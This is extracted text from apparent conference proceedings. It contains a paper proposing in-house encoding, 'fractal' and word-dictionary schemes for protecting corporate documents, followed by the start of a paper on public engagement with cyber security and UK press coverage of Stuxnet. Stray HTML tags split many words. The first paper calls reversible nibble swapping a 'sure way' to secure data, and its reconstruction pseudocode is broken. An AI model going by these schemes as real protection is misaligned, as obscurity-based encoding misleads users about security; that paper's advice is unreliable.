2 GhanaIndiana University of Pennsylvania (IUP), Indiana, USA<br />
dom<strong>in</strong>ic_asamoah@yahoo.co.uk<br />
oblitey@iup.edu<br />
Abstract: Organizations have documents that are not meant for public consumption. These documents provide the<br />
organizations with their competitive advantages. To ma<strong>in</strong>ta<strong>in</strong> their respective competitive advantages and stay <strong>in</strong><br />
bus<strong>in</strong>ess, the documents need to be secured and kept away from all unauthorized personnel. However, <strong>in</strong> this<br />
electronic age, protect<strong>in</strong>g such documents from copy<strong>in</strong>g or even brows<strong>in</strong>g has become rather difficult. Computer<br />
technology has made copy<strong>in</strong>g so easy and yet difficult for people to become aware that such copy<strong>in</strong>g has been<br />
effected. To secure and protect such documents, various methods, <strong>in</strong>clud<strong>in</strong>g encryption techniques, have been<br />
employed. This paper suggests three methods that better ensure the security of such critical electronic data.<br />
Keywords: authentication; critical document; encod<strong>in</strong>g; encryption; <strong>in</strong>tellectual property; security assurance<br />
1. Introduction<br />
Organizations spend huge amounts of their f<strong>in</strong>ancial resources to safeguard their <strong>in</strong>tellectual properties<br />
(trade secrets). Corporate <strong>in</strong>tellectual property which, is needed to ma<strong>in</strong>ta<strong>in</strong> the corporation’s competitive<br />
advantage, ranges from formulae for products to strategic corporate plans. Firewalls are <strong>in</strong>stalled to<br />
restrict unwelcome access from outside the corporate subnet; <strong>in</strong>trusion detection systems are employed<br />
to detect and abort malicious activity; security test<strong>in</strong>gs are embarked upon to assess the effectiveness of<br />
the security measures employed to safeguard the corporate <strong>in</strong>tellectual property and other <strong>in</strong>formation<br />
assets. However, the greatest threat of the corporate <strong>in</strong>tellectual property is people threat, particular<br />
<strong>in</strong>sider threat. Insider threats, or <strong>in</strong>ternal attacks, orig<strong>in</strong>ate from <strong>in</strong>side the organization. They <strong>in</strong>clude<br />
disgruntled employees, curious users, or accidental misuse of the corporate comput<strong>in</strong>g systems. This<br />
paper presents methodologies for secur<strong>in</strong>g corporate <strong>in</strong>tellectual property that takes <strong>in</strong>sider threats <strong>in</strong>to<br />
consideration.<br />
2. Known methods of secur<strong>in</strong>g data and their <strong>in</strong>herent problems<br />
There are several methods presented <strong>in</strong> the literature (see, for example Panko 2005) for protect<strong>in</strong>g data<br />
on comput<strong>in</strong>g systems. These <strong>in</strong>clude physical protection, backup schemes, system logg<strong>in</strong>g,<br />
authentication schemes, and encryption techniques. We expla<strong>in</strong> these methods and describe a few<br />
known problems with their use.<br />
2.1 Physical protection<br />
Physical protection places the document that needs to be secured under lock and key. Some<br />
corporations also rent bank vaults to add extra security to their documents. Backups are stored at<br />
separate locations from the orig<strong>in</strong>al document, mak<strong>in</strong>g them useful should the orig<strong>in</strong>al copy be lost to fire<br />
or other natural disaster. However, keys are known to have been copied and access<strong>in</strong>g the physically<br />
protected data still causes the data to be exposed to the person who is assess<strong>in</strong>g it and also to any<br />
eavesdropper who might be around.<br />
2.2 System Logg<strong>in</strong>g<br />
System logg<strong>in</strong>g is the collection of data on security events <strong>in</strong> a log file. The computer system hold<strong>in</strong>g the<br />
<strong>in</strong>tellectual property can be set up to log any user who accesses that particular file. In addition to logg<strong>in</strong>g<br />
access to the file on the computer system, it has been suggested by Panko (2) that the door to the room<br />
where that particular computer holds the <strong>in</strong>tellectual data can also be logged for later analysis. Thus, if<br />
several <strong>in</strong>cidents occur, an analysis of the door logs might be used to narrow the number of possible<br />
perpetrators to only a few. Aga<strong>in</strong>, hackers who know what they are about can either change their log<br />
entries or remove them from the file.<br />
2.3 Authentication schemes<br />
Authentication schemes are employed to get people to prove their identities before they are provided<br />
access to the system or facility. The four types of authentication mechanisms (someth<strong>in</strong>g you know,<br />
7
Dom<strong>in</strong>ic Asamoah and William Oblitey<br />
someth<strong>in</strong>g you have, someth<strong>in</strong>g you are, and someth<strong>in</strong>g you produce) have been applied <strong>in</strong> various<br />
situations. For more critical situations, strong-authentication schemes which comb<strong>in</strong>e two or more of<br />
these four types have been employed.<br />
2.4 Encryption techniques<br />
Encryption is the process of convert<strong>in</strong>g an orig<strong>in</strong>al massage <strong>in</strong>to a coded form that does not make sense<br />
to anyone who does not have a means of decod<strong>in</strong>g it back to its orig<strong>in</strong>al form. It is accomplished by us<strong>in</strong>g<br />
algorithms to manipulate the pla<strong>in</strong>text message <strong>in</strong>to ciphertext. Encryption can thus be used <strong>in</strong> secur<strong>in</strong>g<br />
the corporate <strong>in</strong>tellectual property. Several encryption techniques exist but the classification is ma<strong>in</strong>ly <strong>in</strong>to<br />
symmetric and asymmetric encryption. Symmetric encryption employs the same encryption algorithm and<br />
key to use <strong>in</strong> both encipher<strong>in</strong>g and decipher<strong>in</strong>g the text. A number of popular symmetric encryption<br />
systems are available. One of the more familiar is Data Encryption Standard (DES) which was developed<br />
by IBM <strong>in</strong> 1977. Another is triple DES (3DES) which was developed as an improvement on DES. A<br />
successor of 3DES is the Advanced Encryption Standard (AES). The problem with simple DES is that the<br />
same <strong>in</strong>put pla<strong>in</strong>text always produces the same output cyphertext, thus provid<strong>in</strong>g opportunities for skilled<br />
cryptanalysts to crack the DES key. 3DES is also slow and uses excessive amounts of memory.<br />
Asymmetric encryption employs two different keys: one for encrypt<strong>in</strong>g the text and the other for<br />
decrypt<strong>in</strong>g it. The encrypt<strong>in</strong>g key is made public for use by anyone who wants to encrypt a message for<br />
the owner but only the owner’s decrypt<strong>in</strong>g key can be used to decrypt the message. One of the most<br />
popular public key cryptosystems is the RSA system. However, several algorithms which exist for<br />
crack<strong>in</strong>g the RSA system were reported by Boneh <strong>in</strong> 1999 and by Salar et. al. <strong>in</strong> 2006.<br />
3. The proposed methods<br />
We propose three methods for securely stor<strong>in</strong>g corporate electronic <strong>in</strong>tellectual property. These are an <strong>in</strong>house<br />
encod<strong>in</strong>g scheme of the document, an object-oriented function for reduc<strong>in</strong>g the document <strong>in</strong>to a<br />
coded form, us<strong>in</strong>g an algorithm close to those used <strong>in</strong> process<strong>in</strong>g fractals. This encoded form of the<br />
document would then have to be expanded back <strong>in</strong>to its orig<strong>in</strong>al form for access. Our third method is the<br />
use of an encoded word function which reduces the document to the m<strong>in</strong>imal amount of words employed<br />
<strong>in</strong> it, and is expanded aga<strong>in</strong> for access.<br />
3.1 Use of <strong>in</strong>-house encod<strong>in</strong>g scheme<br />
One sure way of assur<strong>in</strong>g data security of an extremely critical document is to encode the document<br />
us<strong>in</strong>g an <strong>in</strong>-house cod<strong>in</strong>g scheme that has been def<strong>in</strong>ed such that it is close to the ASCII, EBCDIC, or<br />
Unicode schemes but completely unique to the organization and known only to personnel with corporate<br />
security clearance (Fig. 1). To add to the security of the data, the encoded document would be also<br />
encrypted us<strong>in</strong>g a very strong encryption key. To store this document, it is essential that its<br />
characteristics <strong>in</strong> the form of block size, the medium hold<strong>in</strong>g the document, and its last access date and<br />
time be placed on file (Fig. 2). Even when an authorized person needs to access the document, that<br />
person must be accompanied by an assigned authenticator. Both this person and the authenticator would<br />
then check the block size of the document when uploaded <strong>in</strong>to the computer system aga<strong>in</strong>st the value on<br />
file before grant<strong>in</strong>g permission to the person who wants to access the document. When this person is<br />
done with the document’s access, the authenticator needs to jo<strong>in</strong> him or her to update the characteristics<br />
of the document onto the file for storage.<br />
Algorithm Encode (ASCII)<br />
Read character as orig<strong>in</strong>al code;<br />
Break code <strong>in</strong>to two nibbles;<br />
Call nibbles z-nibble and v-nibble;<br />
Reverse nibbles<br />
Reconstruct document with reversed nibbles (v-nibble concat z-nibble)<br />
Pr<strong>in</strong>t document<br />
Figure 1: Sample <strong>in</strong>-house encod<strong>in</strong>g scheme algorithm<br />
8
Dom<strong>in</strong>ic Asamoah and William Oblitey<br />
Block Size Medium Last Accessed<br />
X Y Z<br />
x – size of file <strong>in</strong> bytes<br />
y – type of medium on which file is stored<br />
z – date of last access of file <strong>in</strong> ddmmyyyy format<br />
Figure 2: File storage parameters<br />
3.2 Use of object-oriented functions<br />
Another method for assur<strong>in</strong>g the security of the data <strong>in</strong> an extremely critical document is to exam<strong>in</strong>e the<br />
document <strong>in</strong> terms of its constituent contents. Documents for digital storage may be of text, images<br />
(<strong>in</strong>clud<strong>in</strong>g music scores), audio, or video. Images, audios, and videos have much resemblance to fractals,<br />
and <strong>in</strong> most cases, can be treated as such. S<strong>in</strong>ce fractals can be split <strong>in</strong>to parts, each of which is a<br />
reduced-size copy of the whole body, the idea of s<strong>in</strong>gl<strong>in</strong>g out a part can be employed <strong>in</strong> secur<strong>in</strong>g the<br />
entire body of the critical document. Most text documents also tend to have parts that are repeated <strong>in</strong><br />
other places with<strong>in</strong> the document. Thus text documents could also be considered as some form of<br />
fractals and the same technique of s<strong>in</strong>gl<strong>in</strong>g out the reduced-size part for later replication <strong>in</strong> secur<strong>in</strong>g<br />
documents can also be applied to these text documents (Fig. 3).<br />
Algorithm Text Fractal<br />
Let Q(n) represent the document;<br />
Let p1, p2, …, pn represent the phrases <strong>in</strong> Q(n);<br />
Let di represent the relative position of pi from start of Q(n);<br />
Where pi = pj = pk = …;<br />
Drop pj, pk, …;<br />
Keep pi;<br />
Append dj, dk, …, to parameters of pi;<br />
Figure 3: Algorithm for creat<strong>in</strong>g fractal function<br />
This method employs the Object-Oriented Programm<strong>in</strong>g compression scheme and it takes the central<br />
recurr<strong>in</strong>g piece of the document and treats that piece as an object. This object is represented as a block<br />
of data or image which is described once and can be reused as many times as desired. The object is a<br />
block of pre-assembled programm<strong>in</strong>g code that is a self conta<strong>in</strong>ed module. The module conta<strong>in</strong>s, or<br />
encapsulates both a chunk of data and the process<strong>in</strong>g <strong>in</strong>struction that may be called upon to be<br />
performed on that replicable data. Once the object becomes part of the program, the process<strong>in</strong>g<br />
<strong>in</strong>struction may or may not be activated. Activation of the process<strong>in</strong>g <strong>in</strong>struction happens only when the<br />
critical document needs to be regenerated. On the regeneration, an alert is sent to the object and the<br />
operation <strong>in</strong>volv<strong>in</strong>g that object is then performed. The performance of the operation is embedded with<strong>in</strong><br />
the process<strong>in</strong>g <strong>in</strong>structions as part of the object.<br />
The suggested method to secure the critical document is therefore to exam<strong>in</strong>e the orig<strong>in</strong>al document as<br />
to whether it shows replicable parts. If this is so, then the reduced-size copy of the document can be<br />
captured <strong>in</strong>to an object-oriented program’s function. The number of repetitions of the reduced-size copy,<br />
when used to <strong>in</strong>voke the function would reproduce the document. Of course, limits and boundaries will be<br />
needed <strong>in</strong> the function to ensure that the exact replica of the orig<strong>in</strong>al documents is what is always<br />
reproduced. This way, the organization would not ma<strong>in</strong>ta<strong>in</strong> any paper documents of the critical data and<br />
would rather employ the algorithm to reproduce a softcopy anytime the document is needed.<br />
3.3 Use of encoded word function<br />
A third method that is be<strong>in</strong>g proposed and which seems to have been overlooked by security experts is<br />
what this dissertation calls the encoded word function scheme. This scheme takes the critical document<br />
and encodes the various words <strong>in</strong> it with reference to their respective positions of occurrence. It then<br />
uses the words to build a data dictionary for use by the function (Fig. 4). The words <strong>in</strong> the data dictionary<br />
9
Dom<strong>in</strong>ic Asamoah and William Oblitey<br />
are kept unique and their frequency of occurrence with<strong>in</strong> the document is referenced aga<strong>in</strong>st each word,<br />
as to its position on a page and on a l<strong>in</strong>e. The function thus only expands the data dictionary to recreate<br />
the document by tak<strong>in</strong>g each word <strong>in</strong> turn and follow<strong>in</strong>g the suggested l<strong>in</strong>ks <strong>in</strong> the data dictionary to<br />
determ<strong>in</strong>e the locations of those words (Fig. 5). Thus both function and data dictionary are needed to<br />
recreate the critical document. The critical document cannot be recreated by either function or data<br />
dictionary by itself. Both must be employed to recreate the critical document. To further enhance the<br />
security of the critical document by this method, the source code to the function should be kept secret,<br />
perhaps <strong>in</strong> a locked cab<strong>in</strong>et, and only the object code used when required. The data dictionary used by<br />
the function can also be encrypted and decryption would then be required before the function can operate<br />
on it.<br />
Word Position of Occurrence <strong>in</strong> Document<br />
Page # L<strong>in</strong>e # Positions on l<strong>in</strong>e<br />
w1 x,y,z… a,b,c… i,j,k,…<br />
w2 x,y,z… a,b,c… i,j,k,…<br />
w3 x,y,z … a,b,c… i,j,k,…<br />
. . . .<br />
. . . .<br />
wn x,y,z a,b,c i,j,k,…<br />
Figure 4: Data dictionary for encoded word function<br />
Figure 5: Algorithm for document reproduction<br />
4. Conclusion<br />
Algorithm Recreate Document<br />
For word = 1, n;<br />
Read wi;<br />
For page = 1, m;<br />
For l<strong>in</strong>e = 1, j;<br />
For postn = 1, p;<br />
Pr<strong>in</strong>t wi;<br />
We have presented three methods for securely stor<strong>in</strong>g corporate electronic <strong>in</strong>tellectual property. The first<br />
was an <strong>in</strong>-house encod<strong>in</strong>g scheme which took the characters <strong>in</strong> the document and broke each down <strong>in</strong>to<br />
the nibbles of the mach<strong>in</strong>e’s encod<strong>in</strong>g scheme. The nibbles were then reversed for storage and would be<br />
reconstructed for future access of the document. The second was an object-oriented function that<br />
reduced the document <strong>in</strong>to a coded form, which employed an algorithm similar to those used <strong>in</strong><br />
process<strong>in</strong>g fractals. This encoded form of the document would then have to be expanded back <strong>in</strong>to its<br />
orig<strong>in</strong>al form for access. Our third method was the use of an encoded word function which reduced the<br />
document to the m<strong>in</strong>imal amount of words employed <strong>in</strong> it, and would have to be expanded aga<strong>in</strong> for<br />
access.<br />
References<br />
Boneh, D.,1999, “Twenty years of attacks on the RSA cryptosystem,” Notices of the American Mathematical Society<br />
(AMS) Vol. 46, No. 2, pp. 203 – 213.<br />
Cormack, G. V, 1985, Data Compression on a Database System. Commun. ACM 28, 12 .<br />
Held, Gilbert., 1987, Data Compression : Techniques and Applications Hardware and Software Considerations, John<br />
Wiley & Sons Ltd.<br />
Mehlhorn, K, 1980. An Efficient Algorithm for Construct<strong>in</strong>g Nearly Optimal Prefix Codes. IEEE Trans. Inform. Theory<br />
26, 5.<br />
Panko, R. R, 2005, Corporate Computer and Network <strong>Security</strong>, Prentice Hall Publishers, Upper Saddle River, NJ.,.<br />
Salah, I.K., Darwish, A., and Oqeili, S.,2006, “Mathematical attacks on RSA cryptosystem,” Journal of Computer<br />
Science, August.<br />
10
Cyber <strong>Security</strong>: Time for Engagement and Debate<br />
Debi Ashenden<br />
Cranfield University, Sw<strong>in</strong>don, UK<br />
d.m.ashenden@cranfield.ac.uk<br />
Abstract: This paper explores the issue of public engagement with cyber security issues and positions it as a key<br />
factor <strong>in</strong> ensur<strong>in</strong>g cyber security. Reported <strong>in</strong>cidents of vigilante hack<strong>in</strong>g are given as examples of the role of the<br />
public <strong>in</strong> cyber security. The case is made that <strong>in</strong> order to ensure public engagement and to manage the potential<br />
threat from vigilante hackers we need more <strong>in</strong>ter-discipl<strong>in</strong>ary academic research and better quality journalism. The<br />
role of the public and the l<strong>in</strong>k between the state and the public as mediated through cyberspace is used as a case<br />
study to set the context. To explore the issue of <strong>in</strong>ter-discipl<strong>in</strong>ary research a brief review of current academic<br />
literature is outl<strong>in</strong>ed. The topic of better quality journalism is exam<strong>in</strong>ed us<strong>in</strong>g content analysis of newspaper reports<br />
focus<strong>in</strong>g on the Stuxnet worm. The paper concludes that at a very basic level without <strong>in</strong>creased academic debate or<br />
better quality journalism we will have little to <strong>in</strong>form our public engagement programme. One area to be addressed<br />
that emerges strongly through the research is the need for a lexicon and framework for discuss<strong>in</strong>g cyber security.<br />
This is necessary, at least at a high level, <strong>in</strong> order to conceptualise the problems and to support work that crosses<br />
academic discipl<strong>in</strong>es. A suggested high level lexicon is presented together with a simple framework to facilitate<br />
engagement and debate.<br />
Keywords: cyber security, debate, engagement, lexicon, framework<br />
1. Introduction<br />
It has been a busy eighteen months <strong>in</strong> the UK for the seem<strong>in</strong>gly ubiquitous term ‘cyber’. It started with the<br />
publication of the UK’s Cyber <strong>Security</strong> Strategy <strong>in</strong> 2009, closely followed by the establishment of the<br />
Office of Cyber <strong>Security</strong> and the Cyber <strong>Security</strong> Operations Centre. Momentum gathered and <strong>in</strong> the<br />
media we have seen report<strong>in</strong>g of the Stuxnet worm as an <strong>in</strong>stance of ‘cyber war’. Also <strong>in</strong> recent months<br />
we have had speeches from the Director General of the <strong>Security</strong> Service and the Director of GCHQ<br />
discuss<strong>in</strong>g ‘cyber espionage’ and ‘cyber security’ respectively. F<strong>in</strong>ally we now have the Strategic Defence<br />
and <strong>Security</strong> Review categoris<strong>in</strong>g cyber security as a Tier One threat and outl<strong>in</strong><strong>in</strong>g plans to <strong>in</strong>vest £650m<br />
on a ‘National Cyber <strong>Security</strong> Programme’ over the next four years. It is a busy time for ‘cyber’.<br />
Cyberspace has been compared to land, sea and air as a space with<strong>in</strong> which we need to protect and<br />
ma<strong>in</strong>ta<strong>in</strong> our position as a nation state. Intuitively this may seem like a helpful comparison but, of course,<br />
cyber is very different from land, sea and air <strong>in</strong> so many ways. As a concept ‘cyber’ is a slippery term,<br />
hard to p<strong>in</strong> down, has different mean<strong>in</strong>gs across different communities and is a prefix for many other<br />
words. When put before ‘espionage’ and ‘warfare’ discussions are usually highly classified but put cyber<br />
before ‘security’ and discussions can be many and varied across both the public and the private sector. It<br />
is not surpris<strong>in</strong>g then that when the term ‘cyber’ is used it is <strong>in</strong>variably quickly followed by a muttered<br />
‘whatever that means’ under the speaker’s breath.<br />
The purpose of this paper is to put the case for why we now need a deeper debate about cyber, <strong>in</strong><br />
particular about specific issues that we can foresee. We have given ‘cyber’ a good air<strong>in</strong>g but now we<br />
need to move on and exam<strong>in</strong>e <strong>in</strong> detail and with precision. An issue that will serve as illustration is the<br />
role of the public and the l<strong>in</strong>k between the state and the public as mediated through cyberspace. The<br />
<strong>in</strong>dividual can easily be both a vulnerability and a threat <strong>in</strong> this space and without debate and public<br />
engagement public activity could have real implications for our ability to protect and ma<strong>in</strong>ta<strong>in</strong> our security.<br />
To tease out such issues <strong>in</strong> order to debate them we will need to cross discipl<strong>in</strong>es from social sciences to<br />
technology and from law to ethics. To engage with the public we will need to develop access to <strong>in</strong>-depth<br />
journalism. None of this will be possible, however, without at least some precision <strong>in</strong> the way we use the<br />
term ‘cyber’.<br />
2. The Problem: The need for public engagement<br />
Public engagement is a vital part of any strategy for cyber security because the public is <strong>in</strong>side the threat<br />
environment. There are ongo<strong>in</strong>g Government campaigns to get the public onl<strong>in</strong>e, free tuition, help to buy<br />
equipment and access <strong>in</strong> public places. The public are tak<strong>in</strong>g an active role <strong>in</strong> cyberspace <strong>in</strong> <strong>in</strong>creas<strong>in</strong>g<br />
numbers and their usage is largely uncontrolled. In the space of land, sea and air the home population<br />
can often be physically separated from the threat environment but they are an <strong>in</strong>tegral part of<br />
11
Debi Ashenden<br />
cyberspace. As a result the public can be both a vulnerability and a threat. To counter the risk this poses<br />
different forms of public engagement will be necessary.<br />
There is an acknowledgement <strong>in</strong> the UK Cyber <strong>Security</strong> Strategy of the role of the public and their<br />
responsibility to protect themselves and their technology. With the connectivity between public and<br />
private sector systems, and with <strong>in</strong>creas<strong>in</strong>g numbers of <strong>in</strong>dividual citizens be<strong>in</strong>g encouraged to <strong>in</strong>teract<br />
onl<strong>in</strong>e, the ability to protect domestic networks and computers has never been higher. Individuals have<br />
an important role to play <strong>in</strong> deliver<strong>in</strong>g the 80% of cyber security described by the Director of GCHQ<br />
(2010); they need to understand how to ensure that they are not <strong>in</strong>advertently facilitat<strong>in</strong>g attacks (for<br />
example, by becom<strong>in</strong>g part of a BotNet). A balance has to be struck, however, between mak<strong>in</strong>g the<br />
public aware of the risks of onl<strong>in</strong>e activities and encourag<strong>in</strong>g them to exploit the benefits available. A<br />
population that loses trust <strong>in</strong> cyber is likely to disengage from us<strong>in</strong>g onl<strong>in</strong>e government services and <strong>in</strong><br />
the current economic climate this would have significant consequences. To counter the vulnerability<br />
posed by the public we have public/private partnerships such as Get Safe Onl<strong>in</strong>e to educate and <strong>in</strong>form<br />
but there is scope to expand and add depth to such <strong>in</strong>itiatives.<br />
The public, however, are also on the <strong>in</strong>side of the rema<strong>in</strong><strong>in</strong>g 20% of cyber security – the complex threat<br />
of cyber espionage, cyber terrorism and cyber war. So what might this threat look like? It is generally<br />
accepted that most of the tools and techniques necessary to carry out cyber attacks are already available<br />
onl<strong>in</strong>e. It is conceivable that an event could take place <strong>in</strong> cyberspace which would prompt retaliation from<br />
sections of the home population. We have already seen the potential of social network<strong>in</strong>g sites for<br />
br<strong>in</strong>g<strong>in</strong>g together and assist<strong>in</strong>g groups of people with a common outlook to mobilize on specific issues.<br />
Attacks launched by such groups would undoubtedly break the law and constitute vigilante activity. On a<br />
small scale presumably this could be handled by law enforcement agencies <strong>in</strong> the same way that any<br />
other vigilante activity is handled. On a larger scale, where there could effectively be mob activity onl<strong>in</strong>e,<br />
this may not be practicable (it is easy to see that at the very least forensic comput<strong>in</strong>g resources could be<br />
quickly exhausted). Such a scenario exemplifies why there needs to be a debate across technical, legal,<br />
policy and ethical boundaries about how to respond. It is highly likely that <strong>in</strong> such circumstances a<br />
number of agencies will need to work together and appropriate governance structures would need to be<br />
<strong>in</strong> place.<br />
This leads us <strong>in</strong>to an exam<strong>in</strong>ation of vigilante activity as evidence of the need to consider the role of the<br />
public as a threat. Is this notion of the ‘patriotic hacker’ too far fetched to warrant consideration? It seems<br />
not. Dorothy Denn<strong>in</strong>g (2003) cites the examples that occurred <strong>in</strong> response to the 9/11 attacks. The<br />
hacker Fluffi Bunny redirected tens of thousands of web sites to one on which he had left a message. A<br />
group called the Dispatchers and led by Hackah Jak defaced hundreds of web sites and threatened to<br />
attack web servers and <strong>in</strong>ternet access <strong>in</strong> Afghanistan and other nations that were perceived to be<br />
support<strong>in</strong>g terrorism. There are <strong>in</strong>stances of nation states that either turn a bl<strong>in</strong>d eye to patriotic hackers<br />
or actively encourage them. One such <strong>in</strong>stance is Ch<strong>in</strong>a’s mobilisation of students aga<strong>in</strong>st Japan (Nye,<br />
2010). Most recently we have seen the ‘hactivist’ group Anonymous launch distributed denial of service<br />
attacks aga<strong>in</strong>st Mastercard, Visa and Paypal <strong>in</strong> protest at the withdrawal of their f<strong>in</strong>ancial services from<br />
Wikileaks (The Guardian, 28 th January 2011). Without doubt it is easy to see how the public can become<br />
a threat <strong>in</strong> cyberspace and the Government will need to be able to manage, m<strong>in</strong>imise or curtail their<br />
actions.<br />
The activities of patriotic hackers can put the nation state <strong>in</strong> a very difficult position. Particularly as it is<br />
<strong>in</strong>creas<strong>in</strong>gly likely that states will be liable for, and expected to take responsibility for, any attacks that are<br />
launched from their jurisdiction. Physical action may be required to halt such activities (such as<br />
disconnect<strong>in</strong>g systems from networks) but alongside this there will be a need for a different form of public<br />
engagement that persuades and <strong>in</strong>fluences <strong>in</strong>dividuals to desist. We need to better understand the<br />
management of power <strong>in</strong> cyberspace where power is no longer concentrated <strong>in</strong> the nation state but is<br />
diffused across the citizen population (Nye, 2010). Cyberspace gives the <strong>in</strong>dividual more power by<br />
enabl<strong>in</strong>g the <strong>in</strong>dividual to carry out his or her own will. The nation state has to learn how to counter this<br />
expression of power and this might take the form of physical action, or by achiev<strong>in</strong>g <strong>in</strong>fluence <strong>in</strong><br />
cyberspace by agenda sett<strong>in</strong>g or fram<strong>in</strong>g activities (Nye, 2010). As the National Research Council (2009)<br />
po<strong>in</strong>ts out <strong>in</strong> a worst case scenario, it may be necessary for a state to direct a cyber attack aga<strong>in</strong>st<br />
patriotic hackers and <strong>in</strong> such a case justification, context, attribution and approval will need to be very<br />
carefully considered.<br />
12
Debi Ashenden<br />
We can see that public engagement is likely to be a key part of a nation’s strategy for ensur<strong>in</strong>g cyber<br />
security. As a potential vulnerability <strong>in</strong>dividuals need to know how to protect themselves and play their<br />
part <strong>in</strong> protect<strong>in</strong>g the UK’s critical <strong>in</strong>frastructure. To counter the potential threat from <strong>in</strong>dividuals we need<br />
to better understand how to frame and manage the cyber agenda, and how to <strong>in</strong>fluence and take action if<br />
civilian activity endangers the security of the nation state. To achieve these aims we need to understand<br />
how to develop messages that engage and <strong>in</strong>form.<br />
3. The approach<br />
The purpose of this paper is to understand what needs to be done to tackle the problem of public<br />
engagement with cyber security. Similarities are often drawn between discussions on cyberspace and the<br />
discussions that surrounded nuclear power <strong>in</strong> previous decades (Clarke & Knake, 2010; Michael et al,<br />
2010). It has been po<strong>in</strong>ted out that even though the nuclear debate <strong>in</strong>volved highly classified <strong>in</strong>formation<br />
governments and academics still found a way to discuss the issues so as to develop strategy and policy<br />
(Clarke & Knake, 2010). There have been a number of calls recently for more debate among experts on<br />
the subject of cyber war and, <strong>in</strong> particular, for the development of an <strong>in</strong>tellectual framework to discuss<br />
cyber issues (National Research Council, 2010). Clarke & Knake take the general call for debate a step<br />
further and suggest that ‘<strong>in</strong>-depth journalism and mean<strong>in</strong>gful academic research’ is needed. At a very<br />
basic level without sufficient debate we will have noth<strong>in</strong>g to <strong>in</strong>form our public engagement programme.<br />
Our start<strong>in</strong>g po<strong>in</strong>t <strong>in</strong> this paper is that we first need to understand what material is available with which to<br />
develop messages. To achieve this aim a two-pronged approach was taken to look at both academic<br />
research and journalism on the subject of cyber security. Firstly, a brief review of the academic literature<br />
recently published on cyber security was carried out. The review considered the arguments put forward<br />
as well as the theoretical approach used <strong>in</strong> the research. Secondly, an exam<strong>in</strong>ation of newspaper articles<br />
was carried out to explore the messages currently be<strong>in</strong>g promulgated to the public. To bound the scope<br />
of the research the recent Stuxnet worm <strong>in</strong>cident was chosen as a case study and content analysis was<br />
used to thematically exam<strong>in</strong>e newspaper reports <strong>in</strong> the UK that reported the <strong>in</strong>cident.<br />
4. Material for develop<strong>in</strong>g a message<br />
There is a paucity of academic literature on cyber and of that which exists much has failed to ma<strong>in</strong>ta<strong>in</strong> its<br />
currency s<strong>in</strong>ce the early 2000s. Furthermore there is the problem of writ<strong>in</strong>g <strong>in</strong> academic silos. Denn<strong>in</strong>g &<br />
Denn<strong>in</strong>g (2010) recently published a discussion paper aimed at encourag<strong>in</strong>g computer scientists to<br />
participate <strong>in</strong> the cyber war discussion and suggest<strong>in</strong>g that their voices have not been heard sufficiently.<br />
This may be specific to the US but the reverse has always seemed to be the case <strong>in</strong> the UK with<br />
computer scientists and technologists dom<strong>in</strong>at<strong>in</strong>g the debate. Based on recent experience, however, it<br />
may well be that this is more a question of different academic communities fail<strong>in</strong>g to engage <strong>in</strong> debate<br />
across discipl<strong>in</strong>es so that a partial view is only ever achieved.<br />
Of the literature that does exist on cyber war there is hardly any that is empirical or grounded <strong>in</strong> theory. In<br />
general there is a tendency to rely on newspaper reports for <strong>in</strong>formation or to use what Bendrath (2001)<br />
refers to as ‘anecdotal collections of well known hacks’- most often the cyber attacks on Estonia and<br />
Georgia. Only a few papers locate their discussion of cyber <strong>in</strong> a wider theoretical discourse such as risk<br />
(Bendrath, 2001), or power (Nye, 2010).<br />
If academic debate and research is lack<strong>in</strong>g then <strong>in</strong>-depth journalism as Farivar (2009) po<strong>in</strong>ts out is even<br />
harder to f<strong>in</strong>d. A review of the ma<strong>in</strong> period of newspaper report<strong>in</strong>g of the recent Stuxnet worm <strong>in</strong> the UK<br />
will serve as illustration. The ma<strong>in</strong> broadsheet newspapers covered the story and articles also appeared<br />
<strong>in</strong> the Sunday newspapers. The only tabloid newspaper to publish stories on Stuxnet was the Daily Mail.<br />
The Economist and the New Scientist also <strong>in</strong>cluded coverage. This seems encourag<strong>in</strong>g and stories were<br />
not conf<strong>in</strong>ed to the technology section of newspapers but were also <strong>in</strong>cluded <strong>in</strong> world news sections.<br />
The first <strong>in</strong>stance of a mention of Stuxnet seems to have been co<strong>in</strong>cidental as it came up dur<strong>in</strong>g an<br />
<strong>in</strong>terview with a computer virus expert from the anti-virus vendor Symantec (The Guardian, 28 th August,<br />
2010). This article was <strong>in</strong> the ‘Money’ section of the newspaper and gave an overview of the work<strong>in</strong>g life<br />
of the <strong>in</strong>terviewee. It was a month later that the story of Stuxnet took off and began to be widely reported.<br />
The ma<strong>in</strong> voice that was heard throughout the report<strong>in</strong>g of Stuxnet and across all ma<strong>in</strong>stream<br />
newspapers dur<strong>in</strong>g this period was from Symantec.<br />
The systems under attack from the Stuxnet worm are generally described as SCADA systems but most<br />
reports go further than this and suggest with vary<strong>in</strong>g degrees of certa<strong>in</strong>ty that a nuclear power station<br />
13
Debi Ashenden<br />
(specifically the Bushehr plant) <strong>in</strong> Iran was the target asset. Several reports either completely fail to<br />
mention that other countries were affected by the worm or it is referred to <strong>in</strong> pass<strong>in</strong>g at the end of the<br />
article.<br />
In the August report The Guardian was told by Symantec that they had ‘no idea of the source’ and that it<br />
was very hard to attribute malware but it was not long before reports were specify<strong>in</strong>g that only a nation<br />
state could have developed the worm and Israel and the US were quickly <strong>in</strong> the frame. This seems be<br />
attribution by f<strong>in</strong>ger-po<strong>in</strong>t<strong>in</strong>g rather than any forensic evidence as the reports are primarily reliant on<br />
commercial, anti-virus, vendors. The dom<strong>in</strong>ant voice was that of Symantec with other companies such as<br />
Lumension, Sophos, Trend Micro and Kaspersky also giv<strong>in</strong>g their views. The only Western Government<br />
comments specific to the Stuxnet worm that are attributed <strong>in</strong> the ma<strong>in</strong>stream media are expressed by the<br />
US through General Alexander (the Head of US Cyber Command). It is only towards the very end of the<br />
report<strong>in</strong>g period that we get a broader range of commentators (although not greater depth of<br />
commentary) from the Director of the US Cyber Consequences Unit, the Centre for Strategic and<br />
International Studies <strong>in</strong> Wash<strong>in</strong>gton and the International <strong>Security</strong> Programme at Chatham House.<br />
The Stuxnet worm has been described recently as an important event but a distraction from the task of<br />
engag<strong>in</strong>g and educat<strong>in</strong>g the public about cyber security. It could be seen, however, as a missed<br />
opportunity to educate the public. In the ma<strong>in</strong>stream media there was very little attempt to engage <strong>in</strong> any<br />
debate that went beyond report<strong>in</strong>g what the anti-virus vendors said. It is unfortunate that if this was a<br />
turn<strong>in</strong>g po<strong>in</strong>t <strong>in</strong> cyber security that the dom<strong>in</strong>ant voice heard by the public belonged to a commercial<br />
company.<br />
